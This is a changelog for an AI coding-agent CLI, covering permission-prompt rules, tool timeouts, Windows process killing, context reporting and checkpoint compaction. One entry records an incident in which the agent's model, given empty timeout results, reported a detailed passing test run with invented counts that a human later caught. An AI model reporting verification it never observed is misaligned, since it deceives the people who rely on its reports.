|
774
|
+
description on a narrow terminal.
|
|
775
|
+
|
|
776
|
+
- **A narrow status line shortens the branch last, not first.** At 56 columns it cut
|
|
777
|
+
`research/next-task` to `research/ne…` and left `scripted/scripted` whole. Both are identity, but
|
|
778
|
+
the branch is the one that changes under you — a rebase or a checkout in a sibling worktree moves
|
|
779
|
+
it without asking, while the model stays where you put it. The branch now gets the wider budget.
|
|
780
|
+
Both shrink together rather than one taking the row: packing is first-fit and skips what will not
|
|
781
|
+
fit, so a branch budget generous enough to crowd the model drops the model entirely instead of
|
|
782
|
+
shortening it.
|
|
783
|
+
|
|
784
|
+
- **A code block's language label sits on the block's rail.** It rendered as a bare dim word at the
|
|
785
|
+
prose indent with nothing joining it to the code below, so `js` read as a one-word paragraph in
|
|
786
|
+
the answer — as if the model had said it. It now shares the left rail the block already draws, so
|
|
787
|
+
it reads as a caption on the block.
|
|
788
|
+
|
|
789
|
+
- **"Always allow" is worth pressing, and a rule can be taken back.** For a shell command the rule
|
|
790
|
+
it wrote was the exact command string, so `Bash(npm run check)` matched that byte sequence and
|
|
791
|
+
nothing else: a user who pressed it to stop being asked was asked again on the very next call.
|
|
792
|
+
`A` now arms the button and each further `A` widens the rule it will write — `Bash(npm run *)`,
|
|
793
|
+
then `Bash(npm *)` — wrapping back to the exact one, with the pattern on the button and a caption
|
|
794
|
+
when the scope is broader than the command. Nothing is committed until Enter. Book declines to
|
|
795
|
+
offer a widening for a command that already chains or redirects (`&&`, `|`, `>`, backticks, `$`),
|
|
796
|
+
because `*` crosses those and the user would be generalizing from an example whose shape they
|
|
797
|
+
cannot see repeated. The chosen rule travels with the decision (`PermissionDecision`), so the
|
|
798
|
+
loop persists what the user picked instead of re-deriving the exact one; approvers that cannot
|
|
799
|
+
widen a scope keep returning the bare result.
|
|
800
|
+
|
|
801
|
+
`/permissions` was a static list captioned "add via the Always allow option at tool prompts" —
|
|
802
|
+
accurate, and the whole problem: a rule went in on one keystroke and came out only by
|
|
803
|
+
hand-editing `.book/settings.local.json`, since `book config unset permissions.allow` drops the
|
|
804
|
+
whole list. It now selects with the arrows and removes with `x`, reports when a rule comes from a
|
|
805
|
+
layer it cannot write, and takes the keyboard while it is open so the arrows do not also scrub
|
|
806
|
+
input history.
|
|
807
|
+
|
|
808
|
+
- **The composer has terminal editing keys again.** It dropped every Ctrl chord, so Ctrl+A, Ctrl+E,
|
|
809
|
+
Ctrl+W, Ctrl+K and Alt+Backspace all did nothing and fixing a typo halfway through a long prompt
|
|
810
|
+
meant holding Backspace — slower still in a language where one character takes several keystrokes
|
|
811
|
+
to compose. Ctrl+U, which reads as "clear the line" in every shell, scrolled the transcript
|
|
812
|
+
instead. All of them now edit the prompt, and Ctrl+Y puts back the last deletion, so the three
|
|
813
|
+
kill keys arrive with their undo rather than after it. Ctrl+E and Ctrl+U keep their transcript
|
|
814
|
+
meanings when the prompt is empty — expanding a tool and scrolling are things you do while
|
|
815
|
+
reading, not while composing — and the shortcut reference says so.
|
|
816
|
+
|
|
817
|
+
- **A single stray letter no longer grants a permanent shell permission.** While a permission
|
|
818
|
+
prompt was open the composer still read `Type a follow-up; Enter queues it`, but the prompt owned
|
|
819
|
+
the keyboard and `A` resolved it as *Always allow*. Typing one `a` therefore ran the command and
|
|
820
|
+
wrote a rule such as `Bash(echo one)` into `.book/settings.local.json` — the letter never appeared
|
|
821
|
+
in the composer, nothing was reported, and nothing in the UI removes a rule once written. The
|
|
822
|
+
composer now says `Answer the prompt above` whenever a modal owns the keyboard, `A` only *arms*
|
|
823
|
+
Always allow and takes a deliberate Enter to grant, and Space no longer activates the selection
|
|
824
|
+
(it left `always` two ordinary keystrokes away — `a` then a space). `R` and `S` keep their
|
|
825
|
+
single-key shortcuts. Enter now reads the armed button from a ref, so `A`-then-Enter in one React
|
|
826
|
+
batch can no longer resolve as the previously selected button.
|
|
827
|
+
|
|
828
|
+
- **`Ctrl+/` opens the keyboard-shortcut reference again.** A terminal sends US (`0x1f`) for that
|
|
829
|
+
chord and Ink's `parseKeypress` reports it as `{ name: '', ctrl: false }`, so the
|
|
830
|
+
`key.ctrl && input === '/'` test never matched — while a unit test synthesizing `{ ctrl: true }`
|
|
831
|
+
passed. The one shortcut advertised on the welcome screen could not be pressed, and the README
|
|
832
|
+
documents no other keyboard reference. `isShortcutsToggleKey` now matches the raw byte and keeps
|
|
833
|
+
the flag form for terminals that do report it.
|
|
834
|
+
|
|
835
|
+
- **Reference panels close, and only one opens at a time.** `/help`, `/status`, `/permissions` and
|
|
836
|
+
the shortcut overlay were four independent booleans that nothing but retyping the command could
|
|
837
|
+
clear, so `/help` then `/status` pinned 43 rows of chrome above the composer and pushed the
|
|
838
|
+
conversation off a 40-row terminal. They now share one slot, Esc closes the open one when nothing
|
|
839
|
+
is in flight (a running turn keeps Esc), and each title row states `Esc to close` — on the title
|
|
840
|
+
rather than a footer, because `/help` already runs taller than a short terminal.
|
|
841
|
+
|
|
842
|
+
- **Book can run its own gate.** A foreground `Bash` command was killed at 120s with no way for the
|
|
843
|
+
model to ask for more, so `npm run check` — the gate `CLAUDE.md` tells Book to run before calling
|
|
844
|
+
work done — could never finish. It takes over 200s here; `npm run test:unit` alone takes 158s.
|
|
845
|
+
The default is now 300s, the model can raise it per call up to 600s with `timeout`, and
|
|
846
|
+
`BOOK_TOOL_TIMEOUT_MS` reaches `Bash` as the README always claimed it did.
|
|
847
|
+
|
|
848
|
+
Three things had to change together. `timeout` was read by both the registry and the shell but
|
|
849
|
+
published in neither's schema — it was classed as a host control and hidden — so a model reading
|
|
850
|
+
the `Bash` schema could not know it existed. Across one 49-call print run the model sent
|
|
851
|
+
`["command"]` 48 times and once reached for `max_runtime_ms`, the only runtime knob on offer,
|
|
852
|
+
which applies to background commands only. `timeout` is now declared on `Bash`, with its default
|
|
853
|
+
and ceiling in the description; it stays hidden everywhere else.
|
|
854
|
+
|
|
855
|
+
`src/tools/shell.ts` also never consulted `ctx.env`, so raising `BOOK_TOOL_TIMEOUT_MS` lifted the
|
|
856
|
+
registry's budget while `Bash` still self-killed at its own module constant. Both now resolve one
|
|
857
|
+
deadline from one place, in one order: the call's `timeout`, then the operator's
|
|
858
|
+
`BOOK_TOOL_TIMEOUT_MS`, then the tool's own default. Where an operator has set that variable it is
|
|
859
|
+
also the ceiling on what a single call may ask for: lowering it to 30s caps a model that asks for
|
|
860
|
+
ten minutes, and a request above the limit in force is refused rather than quietly shrunk, since
|
|
861
|
+
a silent clamp is the same "believed it raised a deadline it did not" failure in another place.
|
|
862
|
+
Raising the variable raises the *default*, which needs no argument to reach; it cannot lift the
|
|
863
|
+
per-call reach above the 600000ms the schema publishes, because a ceiling the model is told about
|
|
864
|
+
and then rejected for using is a guaranteed retry loop. Values that a timer cannot hold no longer
|
|
865
|
+
reach `setTimeout` from any source — Node rewrites a delay past 2^31-1 to **1ms**, so an operator
|
|
866
|
+
writing 3000000000 for "effectively no limit" would have had every command killed instantly, and
|
|
867
|
+
`max_runtime_ms` had no guard at all, turning a 30-day background job into one killed at startup.
|
|
868
|
+
Because `Bash` now publishes `timeout` it is also validated like any other argument instead of
|
|
869
|
+
being dropped: `timeout: "10 minutes"` is an error, not a silently ignored value.
|
|
870
|
+
|
|
871
|
+
A tool's `timeout` argument only sets the host budget when the tool publishes one. Honouring a
|
|
872
|
+
stray value everywhere let it shrink the backstop under a tool that times itself — a `Check` call
|
|
873
|
+
carrying `timeout: 5000` got a 15s budget against its own 600s deadline, reinstating the race
|
|
874
|
+
this resolver exists to prevent — and turned an MCP tool whose own `timeout` means seconds into a
|
|
875
|
+
30ms deadline. Relatedly, `agents.checkTimeoutMs` now outranks `BOOK_TOOL_TIMEOUT_MS`: it is a
|
|
876
|
+
deliberate statement about one suite, and a blanket variable exported for unrelated tuning should
|
|
877
|
+
not cut a 40-minute suite to two minutes.
|
|
878
|
+
|
|
879
|
+
Two neighbours had the same race and are fixed with the same mechanism. `Check` builds a
|
|
880
|
+
deliberate `check_timed_out` result saying the suite was killed rather than failed — the
|
|
881
|
+
distinction a completion gate depends on — and its 120s deadline sat exactly on the registry's,
|
|
882
|
+
so that result was being discarded; its deadline comes from `agents.checkTimeoutMs`, so the
|
|
883
|
+
declaration is resolved per call rather than fixed. `WebFetch` self-clamps at 120s and collided
|
|
884
|
+
at the same point. `Bash` no longer treats `timeout` as a legacy alias for `max_runtime_ms` on a
|
|
885
|
+
background call, which was harmless only while the argument was invisible: now that the schema
|
|
886
|
+
advertises it, honouring it there would put a kill timer on the very job the model backgrounded
|
|
887
|
+
to escape one.
|
|
888
|
+
|
|
889
|
+
The reason nothing came back was a race, not a buffering accident. Both deadlines were 120000ms,
|
|
890
|
+
and the registry arms its timer before `tool.execute` is reached, so at equal values it always
|
|
891
|
+
fired first and answered with its own contentless `tool_timeout`. The shell's partial-output path
|
|
892
|
+
had been unreachable in practice. A tool that enforces its own deadline now declares `timeoutMs`
|
|
893
|
+
and the registry adds a grace margin on top, leaving the tool's report — which carries what the
|
|
894
|
+
command actually printed — the one that wins.
|
|
895
|
+
|
|
896
|
+
What the model receives is now a killed command rather than a failed one, on both streams:
|
|
897
|
+
stderr was being dropped, and for a build that dies mid-run that is usually where the only clue
|
|
898
|
+
is. The two are labelled rather than concatenated, since they are written on independent
|
|
899
|
+
schedules and gluing them together presents a sequence that never happened. The result is built
|
|
900
|
+
after the process tree is torn down *and* the pipes have drained — on POSIX the teardown only
|
|
901
|
+
confirms the process group is gone, so without the second wait the last chunk a batching runner
|
|
902
|
+
flushed on its way out could still be in flight. The distinction is not cosmetic — retrying a
|
|
903
|
+
killed command identically is pointless, retrying with a larger `timeout` is not — so the message
|
|
904
|
+
names the deadline it hit and the remediation names the ways past it, naming the effective
|
|
905
|
+
ceiling rather than a number the operator's own limit has already ruled out. When such a result
|
|
906
|
+
is too large for the model-facing budget it is clipped from the **head**, keeping the tail: a
|
|
907
|
+
killed build is judged on the step it was on when the deadline hit, and head-clipping returned
|
|
908
|
+
install noise while dropping exactly the progress the report exists to deliver. That clip happens
|
|
909
|
+
in `boundToolResultOutput`, which is where every result the agent loop produces is bounded and
|
|
910
|
+
where the output of an oversized failure is folded into the error message — the transcript row is
|
|
911
|
+
clipped the same way, so what the model reads and what the user sees agree.
|
|
912
|
+
|
|
913
|
+
This mattered beyond ergonomics. Handed eight bare timeouts with zero bytes each, the model in
|
|
914
|
+
that run reported a detailed gate pass it had never observed, naming per-step results and
|
|
915
|
+
`207 test files passed (2467 tests)` for commands that returned nothing; the real numbers were
|
|
916
|
+
264 and 3148. The change was correct and the fabrication was caught by re-running the gate by
|
|
917
|
+
hand, but a supervisor who trusted the report would have committed unverified work as verified.
|
|
918
|
+
|
|
919
|
+
- **The background-shell completion row shows the command that ran, not a markdown reading of
|
|
920
|
+
it.** The row was built by interpolating the command into a local transcript message, and local
|
|
921
|
+
messages are prose: `node -e "setInterval(()=>{},1000)/*KILLPROBE*/"` came back as
|
|
922
|
+
`node -e "setInterval(()=>{},1000)/KILLPROBE/"`, both asterisks eaten as emphasis. The `Bash`
|
|
923
|
+
tool row directly above it renders the same string verbatim, so the two rows on one screen
|
|
924
|
+
disagreed about which command had just finished — and the completion row is the only surface
|
|
925
|
+
that reports it. Asterisks were the visible half of the class: `#`, `[x](y)`, `~~` and `_` are
|
|
926
|
+
all live in prose, so a recursive delete of `build/*`, a `grep` for a literal asterisk, or any
|
|
927
|
+
glob rendered wrong.
|
|
928
|
+
|
|
929
|
+
The command is now quoted as inline code, which also matches the tool row's styling. Quoting has
|
|
930
|
+
to survive the command: the fence is one backtick longer than the longest run inside it (so
|
|
931
|
+
``echo `date` `` cannot close its own span), padded when the content's edge would fuse with the
|
|
932
|
+
fence, and line breaks are flattened first — block parsing runs before inline parsing, so a `#`
|
|
933
|
+
opening an embedded line would split the paragraph and strand the fence. Display only; execution
|
|
934
|
+
was never affected.
|
|
935
|
+
|
|
936
|
+
- **A killed background shell really dies now, instead of reporting success and leaking its
|
|
937
|
+
worker.** On Windows the process tree is torn down with `taskkill /T /F`, invoked by bare name
|
|
938
|
+
through `execFile`. `execFile` performs no shell path lookup, so whenever `System32` is missing
|
|
939
|
+
from the inherited `PATH` — the normal case for a Book launched from Git Bash or MSYS, and for
|
|
940
|
+
any sanitized subprocess environment — that call failed with `ENOENT` before it killed anything.
|
|
941
|
+
|
|
942
|
+
The fallback is what made the failure invisible. `proc.kill()` on Windows calls
|
|
943
|
+
`TerminateProcess` on the direct child handle only, and the direct child is the `cmd.exe`
|
|
944
|
+
wrapper rather than the worker it spawned. So `cmd.exe` exited, `waitForShellClose` saw its
|
|
945
|
+
`close` event, and `stop()` / `KillShell` reported `Killed shell <id>` — while the grandchild
|
|
946
|
+
kept running with its working directory still inside the workspace. The comment above
|
|
947
|
+
`terminateProcessTree` asserted that on Windows the direct child closing is authoritative for
|
|
948
|
+
the whole tree; it was authoritative only in the case where `taskkill` had actually run.
|
|
949
|
+
|
|
950
|
+
That is the failure mode an unattended run cannot afford: every background command a long
|
|
951
|
+
session starts and stops leaves a live process behind, holding directories the run may later
|
|
952
|
+
try to remove, with nothing in the transcript indicating it. `taskkill` is now resolved through
|
|
953
|
+
`system32Executable()` against `%SystemRoot%` at all three sites that spawn it — the shell
|
|
954
|
+
manager, the detached job runner, and the harness evaluation runner. The POSIX branch is
|
|
955
|
+
untouched; the helper returns the bare name off Windows.
|
|
956
|
+
|
|
957
|
+
Resolving the path removes the trigger; the structure that hid it is fixed separately. A failed
|
|
958
|
+
`taskkill` has other causes — a child running elevated or as another user refuses one — and in
|
|
959
|
+
every such case the old code still fell back to the direct child and then read the wrapper's
|
|
960
|
+
close as proof the tree was gone. `terminateWindowsProcessTree` now reports whether the tree kill
|
|
961
|
+
was actually confirmed, and neither the shell manager nor the job runner will record a shell as
|
|
962
|
+
`killed` on the strength of the wrapper's close alone. An unconfirmed kill is reported as
|
|
963
|
+
unconfirmed — `KillShell` already had the honest message for it — rather than as success over a
|
|
964
|
+
live worker. A process that had already exited before the attempt still counts as stopped, so
|
|
965
|
+
refusing to trust an unconfirmed kill does not invent a failure where the work was simply done.
|
|
966
|
+
|
|
967
|
+
`%SystemRoot%\System32` resolution is now a general `system32Executable()` helper rather than a
|
|
968
|
+
taskkill special case, because the same bug had a second instance: `src/auth/browser.ts` spawned
|
|
969
|
+
`rundll32` by bare name with `shell: false`, so on any machine whose `PATH` lacks System32,
|
|
970
|
+
`book auth login` could not open a browser and silently fell back to printing the URL.
|
|
971
|
+
|
|
972
|
+
Two foreground process-tree tests in `src/tools/shell.test.ts` were skipped on win32 because
|
|
973
|
+
they failed there. They assert that a marker file the grandchild would write is never written,
|
|
974
|
+
which is precisely this leak, so they are unskipped rather than rewritten — they now cover the
|
|
975
|
+
contract on the platform where it was broken.
|
|
976
|
+
|
|
977
|
+
- **`/context` reported max output tokens as the context window.** For any model without a
|
|
978
|
+
metadata entry -- which behind an OpenAI-compatible router is every model -- the panel fell back
|
|
979
|
+
to `runtimeConfig.maxTokens`, a max *output* budget, and printed it as "Window" and as the
|
|
980
|
+
denominator of "N estimated / X tokens". The TUI status bar directly above it already used
|
|
981
|
+
`resolveContextLimit()`, so the two surfaces disagreed about the same number in the same
|
|
982
|
+
session: the bar read `ctx 5%` while the panel claimed a 64.0k window. `/context` is the surface
|
|
983
|
+
a person checks to decide whether to compact, and it understated the real 272k default 4.25x.
|
|
984
|
+
|
|
985
|
+
It now reports `resolveContextLimit()` -- the window compaction actually acts on -- and says
|
|
986
|
+
when that number is the assumed default rather than something the model declared, since an 8k
|
|
987
|
+
local model behind a router would otherwise be reported as having 272k of headroom on the
|
|
988
|
+
exact surface people use to decide whether to compact. The panel renders `272k (default)` and
|
|
989
|
+
the text report points at `settings.provider.<id>.models.<model>.contextWindow`.
|
|
990
|
+
|
|
991
|
+
`resolveContextLimit()` and `DEFAULT_CONTEXT_WINDOW` moved to `models.ts`, next to the other
|
|
992
|
+
model-id helpers, so the command catalog and the system-prompt builder no longer reach into
|
|
993
|
+
the compaction module (and through it the provider clients) to ask how big a window is. Every
|
|
994
|
+
site that answers that question now routes through them: the skill-catalog budget in
|
|
995
|
+
`agent/loop.ts` and `agent/context.ts` (two `?? 100_000` literals), `skill-registry.ts`
|
|
996
|
+
(a third, now a required parameter), and the tool-schema budget in `tools/catalog.ts`. The
|
|
997
|
+
shared `min(8000, ...)` skill-listing formula, previously written out twice, is now
|
|
998
|
+
`skillListingBudgetChars()` in `skills.ts`.
|
|
999
|
+
|
|
1000
|
+
Two of those are behaviour-neutral: the skill-catalog budget saturates at its cap for any
|
|
1001
|
+
window at or above 100k, and the tool-schema budget is unchanged at the default
|
|
1002
|
+
`schemaTokenBudget` of 8000. The tool-schema budget does change for anyone who raised that
|
|
1003
|
+
setting above 13,600: an undeclared model is now capped by the assumed window like every
|
|
1004
|
+
declared one, which removes an inversion where declaring `contextWindow: 32000` shrank the
|
|
1005
|
+
catalog to 1600 tokens while saying nothing about the same model kept the full budget.
|
|
1006
|
+
|
|
1007
|
+
- **`--effort` is no longer inert on an OpenAI-compatible provider.** `effortExplicit` -- the flag
|
|
1008
|
+
that decides whether `reasoning_effort` is sent at all -- read `BOOK_EFFORT` and `settings.effort`
|
|
1009
|
+
but not the CLI option, so `book --effort max` against a router was accepted, reported, and
|
|
1010
|
+
discarded. The option is now passed into `loadConfig` as an override rather than assigned to the
|
|
1011
|
+
resolved config afterwards, so it counts as the explicit choice it plainly is and outranks the
|
|
1012
|
+
env var, the settings value, and model metadata. `effortExplicit` now means exactly one thing:
|
|
1013
|
+
a human chose this level.
|
|
1014
|
+
|
|
1015
|
+
The option's commander default of `high` is removed as part of this: with it in place the flag was
|
|
1016
|
+
never absent, so an explicit choice could not be told apart from the fallback -- and the fallback
|
|
1017
|
+
overwrote effort already resolved from env, settings, and model metadata. `high` remains the
|
|
1018
|
+
fallback, applied in `loadConfig` after the other sources have had their turn.
|
|
1019
|
+
|
|
1020
|
+
- **`--effort` is validated like every other effort input.** `BOOK_EFFORT` was checked against the
|
|
1021
|
+
level list and `settings.effort` against its schema, but the flag was a bare cast — so a typo was
|
|
1022
|
+
forwarded to the provider as `reasoning_effort` / `output_config.effort` and came back as an
|
|
1023
|
+
opaque HTTP 400 for a mistake the CLI could name exactly. It is now rejected at parse time, with
|
|
1024
|
+
the valid levels listed, and the list itself is derived from the settings schema rather than
|
|
1025
|
+
restated a third time.
|
|
1026
|
+
|
|
1027
|
+
- **The repository no longer pins a model for its contributors.** The checked-in
|
|
1028
|
+
`.book/settings.json` set `model: "qc/qwen3.7-max"` -- a bare model id whose `qc/` prefix names
|
|
1029
|
+
no provider this repository configures. Project scalars outrank the user layer, so every clone
|
|
1030
|
+
had a working `~/.book/settings.json` model overridden by the checked-in one, resolved against
|
|
1031
|
+
the default OpenAI base URL, and reported the mismatch as a missing credential. Choosing a model
|
|
1032
|
+
belongs to the user layer or `--model`, so the file is gone.
|
|
1033
|
+
|
|
1034
|
+
- **A reasoning model on an OpenAI-compatible endpoint no longer dies at the 20-second chat stall
|
|
1035
|
+
ceiling.** `retry.thinkingStallTimeoutMs` (15 minutes) was applied on the Anthropic path only, so
|
|
1036
|
+
the same high-effort run that survives against Anthropic was cancelled mid-thought against a
|
|
1037
|
+
router and reported as `stream_stall` — and `BOOK_STREAM_STALL_TIMEOUT_MS` is clamped to 120 s, so
|
|
1038
|
+
no workaround could reach the ceiling the other path gets by default. Endpoints that buffer a
|
|
1039
|
+
whole thinking block send nothing until it is done, which is exactly the shape the chat ceiling
|
|
1040
|
+
reads as a dead stream. A request now gets the thinking ceiling when it sends `reasoning_effort`
|
|
1041
|
+
or when the model's catalog entry declares an effort range; `effort: false` and models with no
|
|
1042
|
+
entry keep the chat ceiling.
|
|
1043
|
+
|
|
1044
|
+
- **`book -p` reads the prompt from stdin, as its help has always said it does.** Stdin was consumed
|
|
1045
|
+
only for `--input-format stream-json`, so `book -p < prompt.txt` failed with `text input format
|
|
1046
|
+
requires a prompt` on a prompt it had just been handed -- and the error never mentioned
|
|
1047
|
+
`--input-format`, so it read as "you passed no prompt". The obvious way to drive Book from a
|
|
1048
|
+
script now works, and long prompts no longer have to be interpolated into argv. The flag still
|
|
1049
|
+
wins when both are given, a terminal is never read from (an interactive `book -p` would have hung
|
|
1050
|
+
instead of reporting the usage error), and the error now names all three ways to supply a prompt.
|
|
1051
|
+
|
|
1052
|
+
- **An unresolvable provider prefix in a model id is reported instead of silently falling back.**
|
|
1053
|
+
`model: "qc/qwen3.7-max"` with no `qc` provider configured resolved against
|
|
1054
|
+
`https://api.openai.com/v1` -- an endpoint the user never chose, for a vendor that has never
|
|
1055
|
+
heard of the model -- and said nothing. The only symptom was a separate `Credentials: not
|
|
1056
|
+
resolved` line, which sends the user looking for a missing key rather than a misspelled provider
|
|
1057
|
+
id. It still resolves rather than throwing, because `meta-llama/llama-3-70b` is the same spelling
|
|
1058
|
+
and a legitimate model name; the warning is raised only once providers are configured and the
|
|
1059
|
+
prefix matches none of them. Surfaced on stderr at startup and inline in `book doctor`, above the
|
|
1060
|
+
credentials line it used to be mistaken for.
|
|
1061
|
+
|
|
1062
|
+
- **`book doctor` can now get past, and point at, the settings layer that breaks it.** It listed all
|
|
1063
|
+
three layers as present and marked none of them as the source of the offending value, so finding
|
|
1064
|
+
it meant `jq`-ing all three by hand -- and `--no-settings`, declared on the root command and on
|
|
1065
|
+
`book config`, was not declared on `doctor`, so there was no way around the layer either. Doctor
|
|
1066
|
+
now resolves cumulative prefixes of the layer stack and marks the layer the failure first appears
|
|
1067
|
+
with, or says plainly that no single layer accounts for it when the cause is an environment
|
|
1068
|
+
variable. `book doctor --no-settings` reports the rest of the diagnostic with every layer skipped,
|
|
1069
|
+
and marks them `[-]` rather than `[ ]`, which would claim the files do not exist. The closing
|
|
1070
|
+
advice is the flag rather than repointing `BOOK_HOME`, which was heavier and did not help when the
|
|
1071
|
+
bad layer was in the workspace.
|
|
1072
|
+
|
|
1073
|
+
- **`book config set` can no longer write a settings pairing that makes every command fail at
|
|
1074
|
+
load.** It validated the single layer it was writing, which does not determine the effective
|
|
1075
|
+
configuration -- so it accepted `harness.workflow` while the effective `harness.mode` was the
|
|
1076
|
+
`off` default, a combination the loader then rejects. The write succeeded and every subsequent
|
|
1077
|
+
invocation, including the `book config` that would undo it, failed before it started; recovery
|
|
1078
|
+
meant hand-editing JSON. The candidate layer is now resolved through the real merge and put
|
|
1079
|
+
through the loader's own assertions, so the check cannot drift from what actually rejects a
|
|
1080
|
+
configuration, and it sees pairings that span layers in both directions -- a workflow is accepted
|
|
1081
|
+
when the enabling mode lives in another layer, and a mode is refused when it would disable a
|
|
1082
|
+
workflow another layer selects. A configuration that was *already* broken stays writable: only a
|
|
1083
|
+
write that introduces the failure is refused, because repairing one is the reason to run the
|
|
1084
|
+
command.
|
|
1085
|
+
|
|
1086
|
+
- **`book config` no longer fails on the configuration it exists to repair.** It resolved the merged
|
|
1087
|
+
settings on every invocation, so one malformed layer made every subcommand throw -- including the
|
|
1088
|
+
read that would have identified the broken file and the write that would have replaced the bad
|
|
1089
|
+
value. The merge is now resolved only for the reads that need it, and a scoped read reports an
|
|
1090
|
+
unreadable layer as unreadable rather than as empty.
|
|
1091
|
+
|
|
1092
|
+
### Fixed
|
|
1093
|
+
|
|
1094
|
+
- **A no-op compaction no longer runs the user's `PreCompact` hooks.** Deciding whether there is
|
|
1095
|
+
anything to summarize is pure and cheap, but it ran *after* the hooks — so every compaction
|
|
1096
|
+
attempt that immediately returned `too-short` had already executed whatever shell commands
|
|
1097
|
+
the user configured. On a long run the auto-compaction check fires repeatedly near the threshold, and
|
|
1098
|
+
a hook with a side effect (a commit, a notification, a snapshot) was being fired each time for a
|
|
1099
|
+
compaction that never happened. The emptiness check now runs first.
|
|
1100
|
+
|
|
1101
|
+
- **A checkpoint quoting a build error is no longer rejected as a hallucination.** The reducer is
|
|
1102
|
+
shown each message serialized with its reasoning, tool arguments, tool-result bodies, and file
|
|
1103
|
+
observations, but its quotes were validated against the message's `content` alone. So a faithful
|
|
1104
|
+
quote of the exact thing worth remembering -- a compiler error, a failing assertion, a command's
|
|
1105
|
+
output -- failed validation, burned the single repair attempt, and dropped the whole generation
|
|
1106
|
+
to the degraded fallback. Quotes are now checked against the same bytes the reducer was given.
|
|
1107
|
+
|
|
1108
|
+
- **A 31st touched file no longer throws away the whole checkpoint.** The 30-file cap was a schema
|
|
1109
|
+
rule, so exceeding it failed the parse rather than trimming the excess -- spending the repair
|
|
1110
|
+
attempt and degrading the generation. Worse, the same rule ran when *re-reading* a prior
|
|
1111
|
+
checkpoint from history, so an over-long checkpoint silently stopped being recognized as one and
|
|
1112
|
+
every inherited fact in it was discarded. The cap is now a host trim applied before validation,
|
|
1113
|
+
keeping the newest entries.
|
|
1114
|
+
|
|
1115
|
+
- **One bad reducer reply no longer erases the objective.** When a generation could not be parsed,
|
|
1116
|
+
the deterministic fallback cloned the prior checkpoint -- keeping its constraints, files and
|
|
1117
|
+
episodes -- and then overwrote `state.summary` with a notice, so the accumulated narrative of
|
|
1118
|
+
every generation before it was replaced by the reducer's unusable output. A run compacting
|
|
1119
|
+
repeatedly over days lost what it was doing to a single malformed response. The notice is now
|
|
1120
|
+
appended to the inherited summary, and the inherited text absorbs any truncation so the
|
|
1121
|
+
retrieval instruction always survives.
|
|
1122
|
+
|
|
1123
|
+
- **The compaction reducer is no longer cut off mid-JSON by its own budget.** Its provider
|
|
1124
|
+
`max_tokens` was set to the checkpoint *content* budget, so the model had to fit a whole JSON
|
|
1125
|
+
envelope into the space allotted to the text inside it -- and on an adaptive-thinking model the
|
|
1126
|
+
thinking is spent from that same cap, with no compaction exemption. The cap is now derived above
|
|
1127
|
+
the content budget, bounded by the model's own output limit and by the room the summarizer's
|
|
1128
|
+
input leaves in the window. A reply that still stops at the cap is recognized as truncated
|
|
1129
|
+
rather than malformed, so it no longer spends the single repair attempt on a longer prompt that
|
|
1130
|
+
could only overrun again.
|
|
1131
|
+
|
|
1132
|
+
- **Compaction no longer compresses the same text once per chunk.** `fitCheckpoint` ran inside
|
|
1133
|
+
`parseAndValidateCheckpoint`, which runs once per chunk of a multi-pass reduction -- so in a
|
|
1134
|
+
K-chunk plan the first chunk's checkpoint was fitted K times, again in the post-budget loop, and
|
|
1135
|
+
again at every future generation. The ladder is lossy and restarts at 512 characters each time,
|
|
1136
|
+
so a constraint stated once in full was truncated, then the truncation truncated, until it was
|
|
1137
|
+
dropped outright: a regression test shows a verbatim constraint disappearing from the second
|
|
1138
|
+
chunk's prompt entirely under the old order. Fitting now happens once, at the end, where it is
|
|
1139
|
+
already followed by validation and a deterministic fallback.
|
|
1140
|
+
|
|
1141
|
+
- **A context overflow under Zero-Mem is recoverable again.** The experiment disabled routine
|
|
1142
|
+
auto-compaction, which is intended -- but it also nulled the loop's `onCompact` callback
|
|
1143
|
+
entirely, and the loop's context-overflow recovery is deliberately *not* gated on the
|
|
1144
|
+
auto-compaction setting. So the one path that exists to rescue a turn the provider has already
|
|
1145
|
+
refused for size could never run, and `AgentSession.compact` would have answered it by warming a
|
|
1146
|
+
search index in any case. An automatic attempt now runs the real compactor; `/compact` still only
|
|
1147
|
+
warms the index.
|
|
1148
|
+
|
|
1149
|
+
- **The compaction fidelity warning means something again.** Checkpoint `coverage` merged the prior
|
|
1150
|
+
generation's status and reasons into the current one, so a single degraded generation marked
|
|
1151
|
+
every generation after it for the life of the conversation -- and on a long run that happens
|
|
1152
|
+
within hours, after which "compacted with reduced fidelity" is permanent and carries no
|
|
1153
|
+
information. `coverage.status` and `coverage.reasons` now describe the generation that just ran,
|
|
1154
|
+
and a new optional `coverage.lifetime` carries the accumulated record so nothing is forgotten.
|
|
1155
|
+
Stream-JSON `compact` records gain `coverage_lifetime_status` alongside `coverage_status`. The
|
|
1156
|
+
checkpoint version stays `2` and no reason enum gained a member, so an older binary reading one
|
|
1157
|
+
of these checkpoints still sees a valid v2 document.
|
|
1158
|
+
|
|
1159
|
+
- **Compaction fidelity is measurable, and the first measurement is bad.** There was no fidelity
|
|
1160
|
+
metric at all, so every quality claim about compaction -- including the ones in this changelog --
|
|
1161
|
+
was unfalsifiable. `src/agent/compact-fidelity.ts` scores a completed multi-generation run
|
|
1162
|
+
(retention, generational loss order, supersession correctness, source grounding, retention
|
|
1163
|
+
precision, reducer calls, post-request utilization) with no provider in the loop, against the
|
|
1164
|
+
tagged planted-fact corpus now shared with `npm run eval:compact`. The recorded v2 baseline over
|
|
1165
|
+
eight generations: **only the newest third of planted facts survive, the oldest go first, and
|
|
1166
|
+
retention of the user's own opening constraints is zero.** Those thresholds are now asserted in
|
|
1167
|
+
the unit tier and move upward only.
|
|
1168
|
+
|
|
1169
|
+
- **Compaction's enlarged reducer cap can no longer overflow a multi-chunk reduction.** Fitting once
|
|
1170
|
+
at the end means the rolling checkpoint that seeds the next chunk's prompt is bounded by the
|
|
1171
|
+
reducer's output cap rather than by the smaller budget the plan reserved for it, so the two
|
|
1172
|
+
changes together could push a chunk request past the context window. The cap is now bounded by
|
|
1173
|
+
the arithmetic that keeps the worst-case request plus its own output inside the window.
|
|
1174
|
+
|
|
1175
|
+
### Added
|
|
1176
|
+
|
|
1177
|
+
- **A run says what it is doing while it does it (`<BOOK_HOME>/runs/<session>.json`).** Rewritten at
|
|
1178
|
+
every turn boundary with turn, elapsed, spend, the current todo, the last tool, free disk, and the
|
|
1179
|
+
terminal outcome once there is one. Until now the choice was silence or a firehose: the default
|
|
1180
|
+
`--output-format text` emits nothing at all until a run terminates, and the only other on-disk
|
|
1181
|
+
signal is the transcript's mtime — which advances at exactly the same rate for a healthy run, a
|
|
1182
|
+
